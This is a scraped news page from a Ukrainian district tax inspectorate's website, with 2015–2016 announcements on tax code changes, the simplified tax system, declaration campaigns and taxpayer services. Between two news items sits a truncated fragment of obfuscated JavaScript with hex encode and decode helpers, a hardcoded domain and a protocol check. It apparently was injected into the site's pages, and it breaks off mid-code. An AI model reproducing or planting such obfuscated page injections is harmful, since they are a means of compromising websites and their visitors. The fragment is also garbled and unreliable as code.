Середа, 27 Травень 2020
Головне меню
Транслятор
Ukrainian English Russian
Пошук
Авторизація
Повідомлення про корупцію
Банер
Зміни одне життя - Україна
Банер

ДПІ в Міжгірському районі

ОГОЛОШЕННЯ!

ДПІ у Міжгірському районі ГУ ДФС у Закарпатській області повідомляє, що 12 лютого 2016 року у м. Києві відбудеться Всеукраїнський семінар-форум для платників податків. Тема семінару: «Офіційно про податкові новації-2016».

 

Програма семінару додається

Останнє оновлення (28 січня 2016)

 

ПОДАТКОВІ НОВАЦІЇ — 2016

1 січня 2016 року набув чинності Закон України від 24 грудня 2015 р. № 909-УІІІ «Про внесення змін до Податкового кодексу України та деяких законодавчих актів України щодо забезпечення збалансованості бюджетних надходжень у 2016 році». Цей документ став основою для ухвалення Державного бюджету на поточний рік.

Пропонуємо короткий огляд змін.

Останнє оновлення (28 січня 2016)

Детальніше...

 

Щодо застосування спрощеної системи оподаткування

Законом України від 24 грудня 2015 року № 909-VIII «Про внесення змін до Податкового кодексу України та деяких законодавчих актів України щодо забезпечення збалансованості бюджетних надходжень у 2016 році», який набрав чинності з 1 січня 2016 року, внесено зміни щодо застосування спрощеної системи оподаткування в 2016 році, які спровокували шквал звернень платників податків.

У зв`язку з цим, ДФС переглянула лист від 18.01.2016 №1527/7/99-99-17-02-02-17 «Про окремі зміни у  законодавстві щодо спрощеної системи  оподаткування», внаслідок чого до листа внесено наступні зміни:

Останнє оновлення (22 січня 2016)

Детальніше...

 

Детінізація заробітної плати

Кожному громадянину нашої країни гарантується право заробляти собі на життя працею та отримувати за це винагороду у вигляді заробітної плати не нижче від визначеної законом. Мінімальна заробітна плата є державною соціальною гарантією, обов’язковою на всій території України для підприємств усіх форм власності і господарювання. Винагорода за виконану роботу є основним джерелом формування доходів працюючих громадян та основою при розрахунку розміру пенсії. Однак,  на жаль, деякі роботодавці ведуть подвійну бухгалтерію -  виплачують людині певний  розмір заробітної плати,  а відрахування   єдиного соціального внеску здійснюють із суми, що значно менша за отриману тією чи іншою особою.

Останнє оновлення (22 січня 2016)

Детальніше...

 

У 2015 році до зведеного бюджету забезпечено надходження у розмірі 61,5 млн.грн.

Державною податковою інспекцією у Міжгірському районі ГУ ДФС у Закарпатській області у  2015 році досягнуто значне збільшення надходжень до Зведеного бюджету у порівнянні  з 2014 року, а саме, на 15  мільйонів гривень, або на 32,2 відсотки.

За 2015 рік надходження до Державного бюджету забезпечено у сумі 24,2 мільйонів гривень, що більше від показника 2014 року у 2 рази (на 12,6 мільйонів гривень).

Останнє оновлення (05 січня 2016)

Детальніше...

 

З 1 січня розпочалась Деклараційна кампанія - 2016

Державна податкова інспекція у Міжгірському районі доводить до відома, що з 1 січня до 1 травня 2016 року триватиме кампанія декларування майнового стану і доходів, одержаних громадянами у 2015 році. Отримані у минулому році доходи громадянам потрібно буде декларувати за новою формою Декларації, яка набрала чинності з 17 листопада 2015 року.

Останнє оновлення (05 січня 2016)

Детальніше...

 

Що пропонує спрощенцям «компромісний» проект Податкового кодексу

Для платників єдиного податку групи В компромісний варіант Податкового кодексу (Законопроект 3630) передбачає:

Останнє оновлення (17 грудня 2015)

Детальніше...

 

Скільки ЄСВ доведеться сплачувати у 2016 році

За інформацією ВРУ «компромісний»  варіант проекту Закону України «Про створення конкурентних умов  в оподаткуванні та стимулювання економічної діяльності в Україні»  ( зареєстровано за № 3631) передбачає, зокрема, такі зміни щодо нарахування та утримання єдиного соціального внеску (далі ЄСВ):

Останнє оновлення (17 грудня 2015)

Детальніше...

 

За продаж пива у місцях торгівлі без торгівельної зали – штраф.

Продавцю загрожують штрафи за торгівлю пивом у кіосках, палатках, павільйонах, приміщеннях контейнерного типу тощо, якщо вони не відповідають вимогам місця торгівлі. Санкція – 6800 грн.

Поняття місця торгівлі обов’язково передбачає, що покупець повинен зайти до торговельного закладу, вибрати товар ( у цьому випадку алкогольні напої) та здійснити розрахунок. Тобто для торгівлі пивом має бути торгівельна зала.

ДПІ у Міжгірському районі

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "m-rda.gov.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

 

Останнє оновлення (17 грудня 2015)

 

Застосування РРО

Законами України від 28 грудня 2014 року № 71-VIII «Про внесення змін до Податкового кодексу України та деяких законодавчих актів України щодо податкової реформи» (далі - Закон № 71)  та від 01 липня 2015 року № 569-VIII «Про внесення змін до Податкового кодексу України та деяких законів України щодо застосування реєстраторів розрахункових операцій» (далі - Закон № 569) внесено зміни до Податкового кодексу України (далі - Кодекс) і, зокрема, Закону України від 06 липня 1995 року № 265/95-ВР «Про застосування реєстраторів розрахункових операцій у сфері торгівлі, громадського харчування та послуг» (далі - Закон № 265).

Останнє оновлення (11 грудня 2015)

Детальніше...

 

З початку року суб’єктами господарювання Міжгірщини сплачено 71,4 млн. грн. єдиного внеску

За січень – листопад 2015 року ДПІ у Міжгірському районі  забезпечено надходження єдиного внеску на загальнообов’язкове державне соціальне страхування на суму 71,4 млн. гривень. У листопаді 2015 року надійшло майже 7 млн. грн. єдиного внеску.

Останнє оновлення (11 грудня 2015)

Детальніше...

 

До уваги платників податків!

Щодо реєстрації Договорів про визнання електронних документів

Розпочав роботу доопрацьований електронний сервіс «Реєстрація договорів про визнання електронних документів».

Останнє оновлення (11 грудня 2015)

Детальніше...

 

За 2015 рік звітуємо за новою формою декларації про доходи

Нова декларація об’єднала звітність з ПДФО та військового збору. Фізичні особи за результатами 2015 року подаватимуть декларацію, в якій крім визначених податкових зобов’язань з податку на доходи фізичних осіб визначатимуть податкові зобов’язання з військового збору. Це одне із нововведень, адже декларація об’єднала звітність з ПДФО та військового збору без запровадження додаткової звітності.

Останнє оновлення (03 грудня 2015)

Детальніше...

 

Мінфін пропонує з прийняттям нового Податкового кодексу встановити 2-річний мораторій на підвищення податків

Ввести заборону терміном  на два роки на збільшення переліку податків і зборів , їх платників і розміри ставок, прав контролюючих органів, переліків, підстав і термінів проведення перевірок платників податків, розмір штрафів і пені пропонує Міністерство фінансів.

Останнє оновлення (03 грудня 2015)

Детальніше...

 

Пульс

Шановні платники податків!

«Пульс» - це гаряча телефонна лінія, до якої цілодобово можна звертатися відвідувачам органів ДФС, в тому числі і суб’єктам зовнішньо-економічної діяльності, для вирішення суперечливих питань та проблем, які виникають у веденні бізнесу та під час спілкування із службовими особами відомства.

Додаток 1

Додаток 2

Останнє оновлення (18 листопада 2015)

 

Надання якісних адміністративних, консультаційних та інформаційних послуг

Одним з пріоритетних завдань Державної податкової інспекції у Міжгірському районі ГУ ДФС у Закарпатській області є надання якісних адміністративних, консультаційних та інформаційних послуг, а також створення сприятливих умов для платників податків.

Платники податків вже звикли, що в податкових органах функціонують Центри обслуговування платників, в яких зосереджені всі послуги, необхідні платникам податків: адміністративні, консультаційні та послуги з прийому звітності і вхідної кореспонденції.

Останнє оновлення (14 липня 2016)

Детальніше...

 

ТРАНСПОРТНИЙ ПОДАТОК

Важливо знати!!!!

Пунктом 267.1 статті 267 Кодексу визначено, що платниками транспортного податку є фізичні та юридичні особи, в тому числі нерезиденти, які мають зареєстровані в Україні, згідно з чинним законодавством, власні легкові автомобілі, що відповідно до підпункту 267.2.1 пункту 267.2 статті 267 Кодексу є об’єктами оподаткування.

Останнє оновлення (18 листопада 2015)

Детальніше...

 

Послуги ДФС платникам.

Головним завданням Центру обслуговування платників ДПІ у Міжгірському районі  Головного управління Державної фіскальної служби у Закарпатській області є забезпечення комфортних умов платникам при отриманні адміністративних послуг та наданні якісної податкової допомоги з питань оподаткування, державної митної справи, єдиного внеску на загальнообов’язкове державне соціальне страхування та іншого законодавства, контроль за додержанням якого покладено на ДФС. До функцій ЦОПу також належать функції прийняття податкової звітності.

Останнє оновлення (06 листопада 2015)

Детальніше...

 

З початку року на території району виявлено нелегальних найманих працівників

Протягом січня – жовтня 2015 року на території  Міжгірського району  виявлено 150 найманих осіб, які працювали без укладання трудових угод з роботодавцями у 128 СПД-фізичних осіб. За результатами вжитих заходів виплачено найманим працівникам 181,9 тис.грн., надійшло до бюджету району  27,2 тис.грн податку на доходи фізичних осіб та 63,1 тис. грн. єдиного внеску.

Останнє оновлення (06 листопада 2015)

Детальніше...

 

Нагадуємо, що у понеділок, 9 листопада, закінчується строк подання до податкової служби

звіту про суми податкових пільг за ІІІ квартал 2015 року;

декларації з податку на додану вартість за ІІІ квартал 2015 року;

декларації з податку на прибуток підприємств* за три квартали 2015 року та квартальної фінансової звітності**;

Останнє оновлення (06 листопада 2015)

Детальніше...

 
Більше статтей...
Правова допомога
Банер
Місцеві вибори 2015
Банер
Електронне звернення
Банер
Для громадян з порушенням слуху
Банер
Офіційні веб-портали

1

12

в

Обласна "Гаряча лінія"
Банер
Календар новин
Держенергоефективність України
Банер
Банер
Статистика
На даний момент 15 гостей на сайті